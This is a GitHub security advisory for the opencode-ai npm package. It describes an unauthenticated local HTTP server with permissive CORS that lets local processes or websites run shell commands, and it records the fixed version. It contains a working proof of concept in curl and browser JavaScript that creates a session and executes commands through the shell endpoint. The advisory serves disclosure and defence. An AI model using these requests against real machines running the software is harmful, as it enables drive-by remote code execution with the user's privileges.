GHSA-vxw4-wv6m-9hhh

Suggest an improvement
Source
https://github.com/advisories/GHSA-vxw4-wv6m-9hhh
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-vxw4-wv6m-9hhh/GHSA-vxw4-wv6m-9hhh.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-vxw4-wv6m-9hhh
Aliases
Published
2026-01-13T20:35:08Z
Modified
2026-02-03T03:00:05.488310Z
Severity
  • 8.8 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVSS Calculator
Summary
OpenCode's Unauthenticated HTTP Server Allows Arbitrary Command Execution
Details

Previously reported via email to support@sst.dev on 2025-11-17 per the security policy in opencode-sdk-js/SECURITY.md. No response received.

Summary

OpenCode automatically starts an unauthenticated HTTP server that allows any local process—or any website via permissive CORS—to execute arbitrary shell commands with the user's privileges.

Details

When OpenCode starts, it spawns an HTTP server (default port 4096+) with no authentication. Critical endpoints exposed:

  • POST /session/:id/shell - Execute shell commands (server.ts:1401)
  • POST /pty - Create interactive terminal sessions (server.ts:267)
  • GET /file/content?path= - Read arbitrary files (server.ts:1868)

The server is started automatically in cli/cmd/tui/worker.ts:36 via Server.listen().

No authentication middleware exists in server/server.ts. The server uses permissive CORS (.use(cors()) with default Access-Control-Allow-Origin: *), enabling browser-based exploitation.

PoC

Local exploitation:

API="http://127.0.0.1:4096"  # update with actual port
SESSION_ID=$(curl -s -X POST "$API/session" -H "Content-Type: application/json" -d '{}' | jq -r '.id')
curl -s -X POST "$API/session/$SESSION_ID/shell" -H "Content-Type: application/json" \
  -d '{"agent": "build", "command": "echo PWNED > /tmp/pwned.txt"}'
cat /tmp/pwned.txt  # outputs: PWNED

Browser-based exploitation:

A malicious website can exploit visitors who have OpenCode running. Confirmed working in Firefox. PoC available upon request.

// Malicious website JavaScript
fetch('http://127.0.0.1:4096/session', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: '{}'
})
.then(r => r.json())
.then(session => {
  fetch(`http://127.0.0.1:4096/session/${session.id}/shell`, {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({agent: 'build', command: 'id > /tmp/pwned.txt'})
  });
});

Note: Chrome 142+ may prompt for Local Network Access permission. Firefox does not.

Impact

Remote Code Execution via two vectors:

  1. Local process: Any malicious npm package, script, or compromised application can execute commands as the user running OpenCode.

  2. Browser-based (confirmed in Firefox): Any website can execute commands on visitors who have OpenCode running. This enables drive-by attacks via malicious ads, compromised websites, or phishing pages.

With --mdns flag, the server binds to 0.0.0.0 and advertises via Bonjour, extending the attack surface to the entire local network.

Code analysis, CVSS scoring, and documentation assisted by Claude AI (Opus 4.5). Vulnerability verification and PoC testing performed by the reporter.

Database specific 
{
    "nvd_published_at": "2026-01-12T23:15:53Z",
    "cwe_ids": [
        "CWE-306",
        "CWE-749",
        "CWE-942"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-13T20:35:08Z"
}
References

Affected packages

npm / opencode-ai

Package

Name
opencode-ai
View open source insights on deps.dev
Purl
pkg:npm/opencode-ai

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.0.216

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-vxw4-wv6m-9hhh/GHSA-vxw4-wv6m-9hhh.json"